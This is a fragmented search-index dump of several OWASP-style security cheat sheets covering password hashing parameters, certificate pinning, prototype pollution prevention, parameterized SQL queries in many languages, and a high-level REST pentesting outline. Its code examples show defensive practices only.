The main three algorithms that should be considered are listed below:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#argon2id","title":"Argon2id","text":"

Argon2 is the winner of the 2015 Password Hashing Competition. There are three different variants of the algorithm, and the Argon2id variant should be used, as it provides a balanced approach to resisting both side-channel and GPU-based attacks.

Rather than a simple work factor like other algorithms, Argon2id has three different parameters that can be configured. Argon2id should use one of the following configuration settings as a base minimum which includes the minimum memory size (m), the minimum number of iterations (t) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.
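
As an illustration, a minimal sketch of Argon2id in Python using the argon2-cffi package. The parameter values (19 MiB of memory, 2 iterations, parallelism of 1) are an assumed baseline, since the configuration table itself is not reproduced here; substitute one of the listed settings.

from argon2 import PasswordHasher                 # third-party: pip install argon2-cffi
from argon2.exceptions import VerifyMismatchError

# Assumed baseline parameters: m=19456 KiB (19 MiB), t=2, p=1.
ph = PasswordHasher(memory_cost=19456, time_cost=2, parallelism=1)

stored = ph.hash("correct horse battery staple")  # salt is generated automatically

def login(candidate: str) -> bool:
    try:
        ph.verify(stored, candidate)
        return True
    except VerifyMismatchError:
        return False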

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#scrypt","title":"scrypt","text":"

scrypt is a password-based key derivation function created by Colin Percival. While Argon2id should be the best choice for password hashing, scrypt should be used when the former is not available.

Like Argon2id, scrypt has three different parameters that can be configured. scrypt should use one of the following configuration settings as a base minimum which includes the minimum CPU/memory cost parameter (N), the blocksize (r) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.
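
A minimal Python sketch using the standard library's hashlib.scrypt (available when Python is built against OpenSSL 1.1 or later). The parameters N=2^17, r=8, p=1 are an assumed baseline; substitute one of the listed settings.

import hashlib, hmac, os

# Assumed baseline parameters: N=2**17, r=8, p=1 (roughly 128 MiB of memory per hash).
N, R, P = 2**17, 8, 1
MAXMEM = 136 * 1024 * 1024   # hashlib.scrypt needs an explicit cap above its default memory limit

def hash_password(password, salt):
    return hashlib.scrypt(password.encode(), salt=salt, n=N, r=R, p=P,
                          maxmem=MAXMEM, dklen=32)

salt = os.urandom(16)                         # unique per user, stored alongside the hash
stored = hash_password("correct horse battery staple", salt)

def verify(candidate, salt, stored):
    return hmac.compare_digest(hash_password(candidate, salt), stored)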

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#bcrypt","title":"bcrypt","text":"

The bcrypt password hashing function should be the best choice for password storage in legacy systems or if PBKDF2 is required to achieve FIPS-140 compliance.

The work factor should be as large as verification server performance will allow, with a minimum of 10.
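
A short sketch using the Python bcrypt package; the cost of 12 is an illustrative value chosen to satisfy the minimum of 10 mentioned above, not a figure taken from the text.

import bcrypt   # third-party: pip install bcrypt

# The work factor (cost) is embedded in the generated salt and stored with the hash.
stored = bcrypt.hashpw(b"correct horse battery staple", bcrypt.gensalt(rounds=12))

# Verification re-uses the salt and cost embedded in the stored hash.
assert bcrypt.checkpw(b"correct horse battery staple", stored)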

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#input-limits","title":"Input Limits","text":"

bcrypt has a maximum input length of 72 bytes in most implementations. To protect against this issue, a maximum password length of 72 bytes (or less if the implementation in use has smaller limits) should be enforced when using bcrypt.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pre-hashing-passwords","title":"Pre-Hashing Passwords","text":"

An alternative approach is to pre-hash the user-supplied password with a fast algorithm such as SHA-256, and then to hash the resulting hash with bcrypt (i.e., bcrypt(base64(hmac-sha256(data:$password, key:$pepper)), $salt, $cost)). This is a dangerous (but common) practice that should be avoided due to password shucking and other issues when combining bcrypt with other hash functions.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2","title":"PBKDF2","text":"

PBKDF2 is recommended by NIST and has FIPS-140 validated implementations. So, it should be the preferred algorithm when these are required.

PBKDF2 requires that you select an internal hashing algorithm such as an HMAC or a variety of other hashing algorithms. HMAC-SHA-256 is widely supported and is recommended by NIST.

The work factor for PBKDF2 is implemented through an iteration count, which should be set differently based on the internal hashing algorithm used.
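
A sketch using the standard library's hashlib.pbkdf2_hmac with HMAC-SHA-256. The iteration count of 600,000 is an assumption made for this example; consult the current iteration recommendations for the internal hash you choose.

import hashlib, hmac, os

ITERATIONS = 600_000   # assumed figure for PBKDF2-HMAC-SHA256; adjust to current guidance

def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

salt = os.urandom(16)                         # unique per user, stored alongside the hash
stored = hash_password("correct horse battery staple", salt)

def verify(candidate, salt, stored):
    return hmac.compare_digest(hash_password(candidate, salt), stored)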

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#parallel-pbkdf2","title":"Parallel PBKDF2","text":"

These configuration settings are equivalent in the defense they provide. (Numbers as of December 2022, based on testing of RTX 4000 GPUs.)

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2-pre-hashing","title":"PBKDF2 Pre-hashing","text":"

When PBKDF2 is used with an HMAC, and the password is longer than the hash function's block size (64 bytes for SHA-256), the password will be automatically pre-hashed. For example, the password \"This is a password longer than 512 bits which is the block size of SHA-256\" is converted to the hash value (in hex): fa91498c139805af73f7ba275cca071e78d78675027000c99a9925e2ec92eedd.

A good implementation of PBKDF2 will perform pre-hashing before the expensive iterated hashing phase, but some implementations perform the conversion on each iteration. This can make hashing long passwords significantly more expensive than hashing short passwords. If a user can supply very long passwords, there is a potential denial of service vulnerability, such as the one published in Django in 2013. Manual pre-hashing can reduce this risk but requires adding a salt to the pre-hash step.
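
One possible shape of the salted manual pre-hash described above, sketched in Python; this is illustrative rather than a prescribed construction. The per-user salt keys an HMAC that collapses arbitrarily long input to 32 bytes before the expensive PBKDF2 phase.

import hashlib, hmac

def slow_hash(password, salt, iterations=600_000):
    # Salted pre-hash: reduce arbitrarily long input to a fixed 32 bytes so an attacker
    # cannot force per-iteration re-hashing of a huge password during the slow phase.
    prehash = hmac.new(salt, password.encode(), hashlib.sha256).digest()
    return hashlib.pbkdf2_hmac("sha256", prehash, salt, iterations)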

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-legacy-hashes","title":"Upgrading Legacy Hashes","text":"

For older applications built using less secure hashing algorithms such as MD5 or SHA-1, these hashes should be upgraded to modern password hashing algorithms as described above. When the user next enters their password (usually by authenticating on the application), it should be re-hashed using the new algorithm. It would also be good practice to expire the users' current password and require them to enter a new one so that any older (less secure) hashes of their password are no longer useful to an attacker.

However, this approach means that old (less secure) password hashes will be stored in the database until the user logs in. Two main approaches can be taken to avoid this dilemma.

One method is to expire and delete the password hashes of users who have been inactive for an extended period and require them to reset their passwords to login again. Although secure, this approach is not particularly user-friendly. Expiring the passwords of many users may cause issues for support staff or may be interpreted by users as an indication of a breach.

An alternative approach is to use the existing password hashes as inputs for a more secure algorithm. For example, if the application originally stored passwords as md5($password), this could be easily upgraded to bcrypt(md5($password)). Layering the hashes avoids the need to know the original password; however, it can make the hashes easier to crack. These hashes should be replaced with direct hashes of the users' passwords next time the user logs in.
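
A sketch of the layered upgrade in Python, assuming the legacy store holds hex-encoded md5($password) values and the bcrypt package is available (both assumptions).

import hashlib
import bcrypt   # third-party: pip install bcrypt

def upgrade(legacy_md5_hex: str) -> bytes:
    # Wrap the existing MD5 digest in bcrypt without needing the original password.
    return bcrypt.hashpw(legacy_md5_hex.encode(), bcrypt.gensalt())

def verify(password: str, layered_hash: bytes) -> bool:
    md5_hex = hashlib.md5(password.encode()).hexdigest()
    return bcrypt.checkpw(md5_hex.encode(), layered_hash)
    # On success, re-hash the plaintext password directly and replace the layered hash.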

Assume that whatever password hashing method is selected will have to be upgraded in the future. Ensure that upgrading your hashing algorithm is as easy as possible. For a transition period, allow for a mix of old and new hashing algorithms. Using a mix of hashing algorithms is easier if the password hashing algorithm and work factor are stored with the password using a standard format, for example, the modular PHC string format.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#international-characters","title":"International Characters","text":"

Ensure your hashing library is able to accept a wide range of characters and is compatible with all Unicode codepoints. Users should be able to use the full range of characters available on modern devices, in particular mobile keyboards. They should be able to select passwords from various languages and include pictograms. Prior to hashing, the entropy of the user's entry should not be reduced. Password hashing libraries need to be able to use input that may contain a NULL byte.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html","title":"Pinning Cheat Sheet","text":""},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Pinning Cheat Sheet is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter's presentation Securing Wireless Channels in the Mobile Space. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#whats-the-problem","title":"What's the problem","text":"

Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-is-pinning","title":"What Is Pinning","text":"

Pinning is the process of associating a host with its expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a pinset (a term taken from Jon Larimer and Kenny Root's Google I/O talk). In this case, the advertised identity must match one of the elements in the pinset.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-add-a-pin","title":"When to Add a Pin","text":"

A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-perform-pinning","title":"When Do You Perform Pinning","text":"

You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-not-pin","title":"When Do You Not Pin?","text":"

Pinning requires control of upcoming certificate attributes. If the certificate key pair cannot be predicted in advance before it is put into service, then pinning will lead to an outage when the endpoint presents a new certificate. For instance, if a certificate provider generates random key pairs whenever a certificate is rotated, and you cannot control when this certificate is put into use, then you will not be able to update your clients until they have already experienced an outage.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-apply-exceptions","title":"When to Apply Exceptions","text":"

If you are working for an organization which practices \"egress filtering\" as part of a Data Loss Prevention (DLP) strategy, you will likely encounter Interception Proxies. I like to refer to these things as \"good\" bad actors (as opposed to \"bad\" bad actors) since both break end-to-end security and we can't tell them apart. In this case, do not offer to allow-list the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being instructed to do so by the folks in Risk Acceptance.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#how-do-you-pin","title":"How Do You Pin","text":"

The idea is to re-use the existing protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.

To harden the channel, the program would take advantage of the OnConnect callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key. See some examples below.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-should-be-pinned","title":"What Should Be Pinned","text":"

In order to decide what should be pinned, you can follow these steps:

  1. Decide if you want to pin the root CA, intermediate CA or leaf certificate:

    For example, the application pins the remote endpoint leaf certificate but includes a backup pin for the intermediate CA. This increases the risk by trusting more certificate authorities but decreases the chances of bricking your app. If there's any issue with the leaf certificate, the app can always fall back to the intermediate CA until you release an app update.

  2. Choose if you want to pin the whole certificate or just its public key.

  3. If you chose the public key, you have two additional choices:

  - Pin the subjectPublicKeyInfo.

  - Pin one of the concrete types such as RSAPublicKey or DSAPublicKey.

subjectPublicKeyInfo:

The three choices are explained below in more detail. I would encourage you to pin the subjectPublicKeyInfo because it has the public parameters (such as {e,n} for an RSA public key) and contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and the figure to the right shows the additional information available.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#certificate","title":"Certificate","text":"

The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use openssl s_client to retrieve the certificate etc. At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function.
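
For illustration only, a Python sketch of that comparison using the standard ssl module; the host name and pinned fingerprint are placeholders. It compares a SHA-256 digest of the retrieved certificate rather than the full embedded copy, a variant discussed in the Hash section below.

import hashlib, socket, ssl

PINNED_SHA256 = "hex-fingerprint-of-the-embedded-certificate"   # placeholder value

def fetch_with_pin(host, port=443):
    ctx = ssl.create_default_context()               # keep normal chain/hostname validation
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)  # leaf certificate, DER encoded
            if hashlib.sha256(der).hexdigest() != PINNED_SHA256:
                raise ssl.SSLError("pinned certificate mismatch - failing the connection")
            tls.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
            return tls.recv(4096)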

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#public-key","title":"Public Key","text":"

Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#hash","title":"Hash","text":"

While the three choices above used DER encoding, it's also acceptable to use a hash of the information. In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like dumpasn1 and other ASN.1 decoders.
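
As a sketch of working with digests, the following Python snippet (using the third-party cryptography package, an assumption for this example) derives the SHA-256 of a certificate's subjectPublicKeyInfo, which is the value a program could embed as its pin.

import base64, hashlib
from cryptography import x509
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def spki_sha256_pin(cert_der: bytes) -> str:
    cert = x509.load_der_x509_certificate(cert_der)
    spki = cert.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
    return base64.b64encode(hashlib.sha256(spki).digest()).decode()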

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#examples-of-pinning","title":"Examples of Pinning","text":"

This section discusses certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. Code has been omitted for brevity, but the key points for the platform are highlighted.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#android","title":"Android","text":"

Since Android N, the preferred way for implementing pinning is by leveraging Android's Network Security Configuration feature, which lets apps customize their network security settings in a safe, declarative configuration file without modifying app code.

To enable pinning, the <pin-set> configuration setting can be used.

If devices running a version of Android that is earlier than N need to be supported, a backport of the Network Security Configuration pinning functionality is available via the TrustKit Android library.

Alternatively, you can use methods such as certificate pinning from OkHttp in order to set specific pins programmatically, as explained in the OWASP Mobile Security Testing Guide (MSTG) and the OkHttp documentation.

The Android documentation provides an example of how SSL validation can be customized within the app's code (in order to implement pinning) in the Unknown CA implementation document. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow instructions from the introduction into testing network communication and the Android specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#ios","title":"iOS","text":"

Apple suggests pinning a CA public key by specifying it in the Info.plist file under App Transport Security Settings. More details can be found in the article \"Identity Pinning: How to configure server certificates for your app\".

TrustKit, an open-source SSL pinning library for iOS and macOS, is available. It provides an easy-to-use API for implementing pinning and has been deployed in many apps.

Otherwise, more details regarding how SSL validation can be customized on iOS (in order to implement pinning) are available in the HTTPS Server Trust Evaluation technical note. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow instructions from the introduction into testing network communication and the iOS specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#net","title":".Net","text":"

.Net pinning can be achieved by using ServicePointManager. An example can be found at the OWASP MSTG.

Download the .Net sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#openssl","title":"OpenSSL","text":"

Pinning can occur at one of two places with OpenSSL. First is the user supplied verify_callback. Second is after the connection is established via SSL_get_peer_certificate. Either method will allow you to access the peer's certificate.

Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in X509_V_OK with a NULL certificate. To check the result of the customary verification:

  1. You must call SSL_get_verify_result and verify the return code is X509_V_OK;
  2. You must call SSL_get_peer_certificate and verify the certificate is non-NULL.

Download: OpenSSL sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#electron","title":"Electron","text":"

electron-ssl-pinning is an open-source SSL pinning library for Electron-based applications. It provides an easy-to-use API for implementing pinning and also provides a tool for fetching configuration based on the needed hosts.

Otherwise, you can validate certificates by yourself using ses.setCertificateVerifyProc(proc).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html","title":"Prototype Pollution Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#explanation","title":"Explanation","text":"

Prototype Pollution is a critical vulnerability that can allow attackers to manipulate an application's JavaScript objects and properties, leading to serious security issues such as unauthorized access to data, privilege escalation, and even remote code execution.

For examples of why this is dangerous, see the links in the Other resources section below.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#suggested-protection-mechanisms","title":"Suggested protection mechanisms","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map","title":"Use \"new Set()\" or \"new Map()\"","text":"

Developers should use new Set() or new Map() instead of using object literals:

let allowedTags = new Set();\nallowedTags.add('b');\nif(allowedTags.has('b')){\n//...\n}\n\nlet options = new Map();\noptions.set('spaces', 1);\nlet spaces = options.get('spaces')\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required","title":"If objects or object literals are required","text":"

If objects have to be used then they should be created using the Object.create(null) API to ensure they don't inherit from the Object prototype:

let obj = Object.create(null);\n

If object literals are required then as a last resort you could use the __proto__ property:

let obj = {__proto__:null};\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms","title":"Use object \"freeze\" and \"seal\" mechanisms","text":"

You can also use the Object.freeze() and Object.seal() APIs to prevent built-in prototypes from being modified. However, this can break the application if the libraries it uses modify the built-in prototypes.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag","title":"Node.js configuration flag","text":"

Node.js also offers the ability to remove the __proto__ property completely using the --disable-proto=delete flag. Note this is a defense in depth measure.

Prototype pollution is still possible using constructor.prototype properties but removing __proto__ helps reduce attack surface and prevent certain attacks.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#other-resources","title":"Other resources","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#credits","title":"Credits","text":"

Credit to Gareth Hayes for providing the original protection guidance in this comment.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html","title":"Query Parameterization Cheat Sheet","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

SQL Injection is one of the most dangerous web vulnerabilities. So much so that it was the #1 item in both the OWASP Top 10 2013 version, and 2017 version. As of 2021, it sits at #3 on the OWASP Top 10.

It represents a serious threat because SQL Injection allows attacker-controlled input to change the structure of a web application's SQL statement in a way that can steal data, modify data, or potentially facilitate command injection to the underlying OS.

This cheat sheet is a derivative work of the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#parameterized-query-examples","title":"Parameterized Query Examples","text":"

SQL Injection is best prevented through the use of parameterized queries. The following chart demonstrates, with real-world code samples, how to build parameterized queries in most of the common web languages. The purpose of these code samples is to demonstrate to the web developer how to avoid SQL Injection when building database queries within a web application.

Please note, many client side frameworks and libraries offer client side query parameterization. These libraries often just build queries with string concatenation before sending raw queries to a server. Please ensure that query parameterization is done server-side!

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#prepared-statement-examples","title":"Prepared Statement Examples","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-built-in-feature","title":"Using Java built-in feature","text":"
String custname = request.getParameter(\"customerName\");\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ? \";  PreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString( 1, custname);\nResultSet results = pstmt.executeQuery( );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-with-hibernate","title":"Using Java with Hibernate","text":"
// HQL\n@Entity // declare as entity;\n@NamedQuery(\nname=\"findByDescription\",\nquery=\"FROM Inventory i WHERE i.productDescription = :productDescription\"\n)\npublic class Inventory implements Serializable {\n@Id\nprivate long id;\nprivate String productDescription;\n}\n\n// Use case\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nList<Inventory> list =\nsession.getNamedQuery(\"findByDescription\")\n.setParameter(\"productDescription\", userSuppliedParameter).list();\n\n// Criteria API\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nInventory inv = (Inventory) session.createCriteria(Inventory.class).add\n(Restrictions.eq(\"productDescription\", userSuppliedParameter)).uniqueResult();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-net-built-in-feature","title":"Using .NET built-in feature","text":"
String query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\ntry {\nOleDbCommand command = new OleDbCommand(query, connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName Name.Text));\nOleDbDataReader reader = command.ExecuteReader();\n// \u2026\n} catch (OleDbException se) {\n// error handling\n}\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-asp-net-built-in-feature","title":"Using ASP .NET built-in feature","text":"
string sql = \"SELECT * FROM Customers WHERE CustomerId = @CustomerId\";\nSqlCommand command = new SqlCommand(sql);\ncommand.Parameters.Add(new SqlParameter(\"@CustomerId\", System.Data.SqlDbType.Int));\ncommand.Parameters[\"@CustomerId\"].Value = 1;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-with-activerecord","title":"Using Ruby with ActiveRecord","text":"
## Create\nProject.create!(:name => 'owasp')\n## Read\nProject.all(:conditions => \"name = ?\", name)\nProject.all(:conditions => { :name => name })\nProject.where(\"name = :name\", :name => name)\n## Update\nproject.update_attributes(:name => 'owasp')\n## Delete\nProject.delete(:name => 'name')\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-built-in-feature","title":"Using Ruby built-in feature","text":"
insert_new_user = db.prepare \"INSERT INTO users (name, age, gender) VALUES (?, ? ,?)\"\ninsert_new_user.execute 'aizatto', '20', 'male'\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-php-with-php-data-objects","title":"Using PHP with PHP Data Objects","text":"
$stmt = $dbh->prepare(\"INSERT INTO REGISTRY (name, value) VALUES (:name, :value)\");\n$stmt->bindParam(':name', $name);\n$stmt->bindParam(':value', $value);\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-cold-fusion-built-in-feature","title":"Using Cold Fusion built-in feature","text":"
<cfquery name = \"getFirst\" dataSource = \"cfsnippets\">\n    SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID =\n    <cfqueryparam value = #intCourseID# CFSQLType = \"CF_SQL_INTEGER\">\n</cfquery>\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-perl-with-database-independent-interface","title":"Using PERL with Database Independent Interface","text":"
my $sql = \"INSERT INTO foo (bar, baz) VALUES ( ?, ? )\";\nmy $sth = $dbh->prepare( $sql );\n$sth->execute( $bar, $baz );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-rust-with-sqlx","title":"Using Rust with SQLx","text":"
// Input from CLI args but could be anything\nlet username = std::env::args().last().unwrap();\n\n// Using built-in macros (compile time checks)\nlet users = sqlx::query_as!(\nUser,\n\"SELECT * FROM users WHERE name = ?\",\nusername\n)\n.fetch_all(&pool)\n.await\n.unwrap();\n\n// Using built-in functions\nlet users: Vec<User> = sqlx::query_as::<_, User>(\n\"SELECT * FROM users WHERE name = ?\"\n)\n.bind(&username)\n.fetch_all(&pool)\n.await\n.unwrap();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-examples","title":"Stored Procedure Examples","text":"

The SQL you write in your web application isn't the only place that SQL injection vulnerabilities can be introduced. If you are using Stored Procedures, and you are dynamically constructing SQL inside them, you can also introduce SQL injection vulnerabilities.

Dynamic SQL can be parameterized using bind variables, to ensure the dynamically constructed SQL is secure.

Here are some examples of using bind variables in stored procedures in different databases.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#oracle-using-plsql","title":"Oracle using PL/SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(UserID varchar, Dept varchar) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = UserID AND department = Dept;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-execute","title":"Stored Procedure Using Bind Variables in SQL Run with EXECUTE","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE AnotherSafeGetBalanceQuery(UserID varchar, Dept varchar)\nAS stmt VARCHAR(400); result NUMBER;\nBEGIN\nstmt := 'SELECT balance FROM accounts_table WHERE user_ID = :1\n            AND department = :2';\nEXECUTE IMMEDIATE stmt INTO result USING UserID, Dept;\nRETURN result;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#sql-server-using-transact-sql","title":"SQL Server using Transact-SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure_1","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = @UserID AND department = @Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-exec","title":"Stored Procedure Using Bind Variables in SQL Run with EXEC","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nDECLARE @sql NVARCHAR(200)\nSELECT @sql = N'SELECT balance FROM accounts_table WHERE '\n+ N'user_ID = @UID AND department = @DPT'\nEXEC sp_executesql @sql,\nN'@UID VARCHAR(20), @DPT VARCHAR(10)',\n@UID=@UserID, @DPT=@Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html","title":"REST Assessment Cheat Sheet","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#about-restful-web-services","title":"About RESTful Web Services","text":"

Web Services are an implementation of web technology used for machine-to-machine communication. As such, they are used for inter-application communication, Web 2.0 and mashups, and by desktop and mobile applications to call a server.

RESTful web services (often called simply REST) are a lightweight variant of Web Services based on the RESTful design pattern. In practice, RESTful web services utilize HTTP requests that are similar to regular HTTP calls, in contrast with other Web Services technologies such as SOAP, which utilizes a complex protocol.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#key-relevant-properties-of-restful-web-services","title":"Key relevant properties of RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#the-challenge-of-security-testing-restful-web-services","title":"The challenge of security testing RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#how-to-pentest-a-restful-web-service","title":"How to pentest a RESTful web service","text":"

Determine the attack surface through documentation - RESTful pen testing might be better off if some level of white box testing is allowed and you can get information about the service.

This information will ensure fuller coverage of the attack surface. Such information to look for:

Collect full requests using a proxy - while always an important pen testing step, this is more important for REST based applications as the application UI may not give clues on the actual attack surface.

Note that the proxy must be able to collect full requests and not just URLs as REST services utilize more than just GET parameters.

Analyze collected requests to determine the attack surface:

Verify non-standard parameters: in some cases (but not all), setting the value of a URL segment suspected of being a parameter to a value expected to be invalid can help determine whether it is a path element or a parameter. If it is a path element, the web server will return a 404 message, while for an invalid value of a parameter the answer will be an application-level message, as the value is legal at the web server level.

Analyzing collected requests to optimize fuzzing - after identifying potential parameters to fuzz, analyze the collected values for each to determine:

Lastly, when fuzzing, don't forget to emulate the authentication mechanism used.

